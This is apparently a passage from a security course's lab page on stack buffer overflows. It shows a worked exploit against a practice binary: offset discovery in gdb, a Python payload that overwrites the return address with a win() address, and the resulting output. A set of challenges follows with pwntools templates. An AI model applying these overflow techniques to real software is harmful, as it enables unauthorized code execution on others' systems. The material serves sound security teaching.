Stopped reason: SIGSEGV
0x41304141 in ?? ()
 
gdb-peda$ patto AA0A
AA0A found at offset: 40

This tells us that we need to write 40 characters into the buffer and then the next 4 bytes will overwrite the return address. Let's test this, again, by writing a script that can generate a payload, which we can easily tailor to our needs. First, let's see if we can reliably change the value of the return address. We'll attempt to write 0xdeadbeef first.

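#!/usr/bin/env python
import struct

# 40 bytes of padding reach the saved return address (offset reported by patto)
payload = b'a' * 40
payload += struct.pack('<I', 0xdeadbeef)

# The payload is raw bytes, so open the file in binary mode
with open('payload', 'wb') as f:
    f.write(payload)

gdb-peda$ r < payload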
Starting program: ./buffer_overflow_ret < payload
Please leave a message: Nothing to see here
 
Program received signal SIGSEGV, Segmentation fault.
 
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0x804b160 ("Please leave a message: Nothing to see here\n")
EDX: 0xf7fb5890 --> 0x0 
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0x61616161 ('aaaa')
ESP: 0xffffd620 --> 0x0 
EIP: 0xdeadbeef
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0xdeadbeef
[------------------------------------stack-------------------------------------]
0000| 0xffffd620 --> 0x0 
0004| 0xffffd624 --> 0xffffd6b4 --> 0xffffd859 ("./buffer_overflow_ret")
0008| 0xffffd628 --> 0xffffd6bc --> 0xffffd8cb ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
0012| 0xffffd62c --> 0xffffd644 --> 0x0 
0016| 0xffffd630 --> 0x1 
0020| 0xffffd634 --> 0x0 
0024| 0xffffd638 --> 0xf7fb4000 --> 0x1d4d6c 
0028| 0xffffd63c --> 0xf7fe575a (add    edi,0x178a6)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xdeadbeef in ?? ()

Excellent. Now we can replace 0xdeadbeef with the address of the win function.

...
payload += struct.pack('<I', 0x080484b6)
...

$ cat payload | ./buffer_overflow_ret
Please leave a message: Nothing to see here
Well done!
Segmentation fault (core dumped)

Our job here is done. Now it's time for you to smash some stacks.

Keep in mind that buffer overflows are not the only type of vulnerability, but they are very common.

Challenges

Before venturing forth, consider the following roadmap when approaching a challenge:
  • disassemble the binary
  • identify the stack buffer
  • identify functions which work with buffers
  • see if there are any mismatches (declared size vs. index used)
  • dynamic analysis in GDB; inject De Bruijn patterns whenever input is read
  • determine offset in buffer
  • write a script which generates a payload to reliably crash/exploit the target
  • keep stdin/connection open for further interaction after obtaining a shell
  • ???
  • PROFIT

Use the following archive.

01. Parrot

Some programs feature “stack smashing protection” in the form of stack canaries, that is, values kept on the stack which are checked before returning from a function. If the value has changed, the check concludes that stack data has been corrupted during the execution of the current function.

We have implemented our very own parrot. Can you avoid it somehow?

Values are little endian. So if you want to send 0xabcd you would send it as \xcd\xab\x00\x00.
To keep a program's standard input open after feeding it a payload, run:
cat payload - | ./program

Or, if you have a payload generator program such as payload.py, run:

cat <(python payload.py) - | ./program
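A generator such as payload.py has to emit raw bytes on standard output. The following is a minimal Python 3 sketch of what it could look like; PADDING_LEN and TARGET_VALUE are placeholders rather than the solution to any challenge, and the trailing newline assumes the target reads its input line by line.

```python
#!/usr/bin/env python3
"""Hypothetical payload.py: writes a raw payload to standard output."""
import struct
import sys

PADDING_LEN = 40         # placeholder: bytes needed to reach the target value
TARGET_VALUE = 0xabcd    # placeholder: 32-bit value to place after the padding


def build_payload(padding_len=PADDING_LEN, value=TARGET_VALUE):
    # "<I" packs an unsigned 32-bit integer, least significant byte first
    # The trailing newline is an assumption: the target reads one line
    return b"A" * padding_len + struct.pack("<I", value) + b"\n"


def main():
    # sys.stdout.buffer accepts bytes; print() would treat them as text
    sys.stdout.buffer.write(build_payload())
    sys.stdout.buffer.flush()


if __name__ == "__main__":
    main()
```

Writing through sys.stdout.buffer keeps bytes above 0x7f intact, which matters as soon as the payload contains addresses rather than printable characters.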

02. Indexing

More complex programs require some form of protocol or user interaction. This is where the great pwntools come in.

Here's an interactive script to get you started:

exploit.py
#!/usr/bin/env python
from pwn import *
 
p = process('./indexing')
 
p.recvuntil('Index: ')
p.sendline() # TODO (must be string)
 
# Give value
p.recvuntil('Value: ')
p.sendline() # TODO (must be string)
p.interactive()

Go through GDB when aiming to solve this challenge. As all input values are strings, you can input them at the keyboard and follow their effect in GDB.
You can inspect the behavior of a program for a given input by doing:
cat payload | strace ./program

That is, you will trace the program being exploited and see read() or other calls and how they fare for a given input.

03. Smashthestack Level7

Now you can tackle a real challenge. See if you can figure out how you can get a shell from this one.

There's an integer overflow + buffer overflow in the program.
Which four 32-bit values, when multiplied by 4, give you, let's say, 256?
In order to run a program that receives command line arguments under gdb, you can do the following:
$ gdb ./main
gdb$ set args arg1 arg2 arg3
gdb$ start
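The hint about 32-bit values is an exercise in modular arithmetic: a 32-bit multiplication keeps only the low 32 bits of the result. The sketch below models that with a mask. The helper names are hypothetical, and whether the program treats the value as signed or unsigned is something to verify in the disassembly.

```python
MASK32 = 0xFFFFFFFF


def mul32(value, factor=4):
    """Multiply the way a 32-bit register would, discarding the overflow."""
    return (value * factor) & MASK32


def to_signed32(value):
    """Reinterpret an unsigned 32-bit value as a signed one."""
    return value - 2**32 if value & 0x80000000 else value


target = 256

# 4 * x == 256 (mod 2**32) has one solution for each multiple of 2**30 added to 64
candidates = [target // 4 + k * 2**30 for k in range(4)]

for x in candidates:
    print("%#010x (signed %d) * 4 -> %d" % (x, to_signed32(x), mul32(x)))
```

Two of the four candidates are negative when read as signed integers, which is typically what lets such a value slip past a signed size check.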

04. Neighbourly

Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. The principle is the same.

The ptext field of the structure is a function pointer. Overwrite it with the address of the win() function.

05. Uninitialized

There's something faulty in the program, and it's not a buffer overflow. Provide the proper input to the executable and get a shell.

Do not use pwntools for this task.

06. Bonus: Uninitialized 2

There's a small update to the uninitialized executable and you need to update your solution.

Use ltrace to understand what's happening differently.
Create a pwntools-based script to solve both the initial executable and the bonus one.

07. Bonus: Birds

Time for a more complex challenge. Be patient and don't speed through it.

session/06.txt · Last modified: 2020/07/19 12:49 (external edit)